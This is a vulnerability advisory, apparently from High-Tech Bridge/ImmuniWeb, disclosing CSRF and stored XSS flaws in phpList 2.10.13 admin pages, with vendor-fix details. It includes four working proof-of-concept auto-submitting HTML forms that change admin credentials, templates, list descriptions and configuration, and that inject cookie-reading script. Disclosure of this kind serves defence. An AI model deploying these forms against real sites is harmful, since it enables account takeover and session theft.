Total Tests:

Cross-site Request Forgery (CSRF) Vulnerabilities in phpList

Advisory ID:HTB22956
Product:phpList
Vendor:Tincan Ltd
Vulnerable Versions:2.10.13 and probably prior
Tested Version:2.10.13
Advisory Publication:April 12, 2011 [without technical details]
Vendor Notification:April 12, 2011
Public Disclosure:April 26, 2011
Vulnerability Type:Cross-Site Request Forgery [CWE-352]
Risk Level:Medium
CVSSv2 Base Score:5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status:Fixed by Vendor
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered vulnerabilities in phpList which could be exploited to perform cross-site request forgery attacks.

1) Cross-site request forgery (CSRF) vulnerabilities in phpList
1.1 The vulnerability exists due to insufficient validation of the request origin in admin/commonlib/lib/userlib.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and change administrator`s credentials. Due to insufficient sanitation of input data in the "email" parameter it is also possible to store and execute arbitrary HTML and script code in user`s browser in context of vulnerable website.
Exploitation example:
<form action="http://host/admin/?page=user&start=0&id=USER_ID&find=&sortby=&sortor der=desc&unconfirmed=0&b lacklisted=0" method="post" name="main" enctype="multipart/form-data">
<input type="hidden" name="formtoken" value="123">
<input type="hidden" name="list" value="">
<input type="hidden" name="id" value="USER_ID">
<input type="hidden" name="returnpage" value="">
<input type="hidden" name="returnoption" value="">
<input type="hidden" name="email" value='email2@example.com"><script>alert(document.cookie)</script>'>
<input type="hidden" name="confirmed" value="1">
<input type="hidden" name="htmlemail" value="123">
<input type="hidden" name="rssfrequency" value="2">
<input type="hidden" name="password" value="test">
<input type="hidden" name="disabled" value="0">
<input type="hidden" name="extradata" value="add">
<input type="hidden" name="foreignkey" value="forkey">
<input type="hidden" name="change" value="Save Changes">
</form>
<script>
document.main.submit();
</script>

1.2 The vulnerability exists due to insufficient validation of the request origin in admin/template.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and modify website settings. Due to insufficient sanitation of input data in the "content" parameter it is also possible to store and execute arbitrary HTML and script code in user`s browser in context of vulnerable website.
Exploitation example:
<form action="http://host/admin/?page=template&id=TEMPLATE_ID" method="post" name="main" enctype="multipart/form-data">
<input type="hidden" name="formtoken" value="123">
<input type="hidden" name="id" value="TEMPLATE_ID">
<input type="hidden" name="title" value="tplname">
<input type="hidden" name="file_template" value="">
<input type="hidden" name="content" value='<script>alert(document.cookie)</script>[CONTENT]'>
<input type="hidden" name="save" value="Save Changes">
</form>
<script>
document.main.submit();
</script>

1.3 The vulnerability exists due to insufficient validation of the request origin in admin/editlist.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and modify pages. Due to insufficient sanitation of input data in the "description" parameter it is also possible to store and execute arbitrary HTML and script code in user`s browser in context of vulnerable website.
Exploitation example:
<form action="http://host/admin/?page=editlist&id=1" method="post" name="main" enctype="multipart/form-data">
<input type="hidden" name="formtoken" value="123">
<input type="hidden" name="id" value="1">
<input type="hidden" name="listname" value="test2">
<input type="hidden" name="listorder" value="0">
<input type="hidden" name="owner" value="1">
<input type="hidden" name="description" value='List <script>alert(document.cookie)</script>[CONTENT]'>
<input type="hidden" name="save" value="Save">
</form>
<script>
document.main.submit();
</script>

1.4 The vulnerability exists due to insufficient validation of the request origin in admin/configure.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and modify configuration. Due to insufficient sanitation of input data in the "description" parameter it is also possible to store and execute arbitrary HTML and script code in user`s browser in context of vulnerable website.
Exploitation example:
<form action="http://host/admin/?page=configure&id=report_address" method="post" name="main" enctype="multipart/form-data">
<input type="hidden" name="formtoken" value="123">
<input type="hidden" name="id" value="report_address">
<input type="hidden" name="values[report_address]" value="email@example.com">
<input type="hidden" name="save" value="1">
<input type="hidden" name="savebutton" value="Save changes">
</form>
<script>
document.main.submit();
</script>

How to Detect Cross-Site Request Forgery Vulnerabilities
Website Security Test
  • GDPR & PCI DSS Test
  • Website CMS Security Test
  • CSP & HTTP Headers Check
  • WordPress & Drupal Scanning
Try For Free

Solution:
Upgrade to the most recent version.
Edit the application source code to ensure that input is properly sanitised (for 1.2-1.3)

More Information:
http://www.phplist.com/?lid=531


References:
[1] High-Tech Bridge Advisory HTB22956 - https://www.immuniweb.com/advisory/HTB22956 - Cross-site Request Forgery (CSRF) Vulnerabilities in phpList
[2] phpList - phplist.com- phplist is the world's most popular open source email campaign manager.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
Book a Call Ask a Question
Close
Talk to ImmuniWeb Experts
ImmuniWeb AI Platform
Have a technical question?

Our security experts will answer within
one business day. No obligations.

Have a sales question?
Email:
Tel: +41 22 560 6800 (Switzerland)
Tel: +1 720 605 9147 (USA)
*
*
*
Your data will stay private and confidential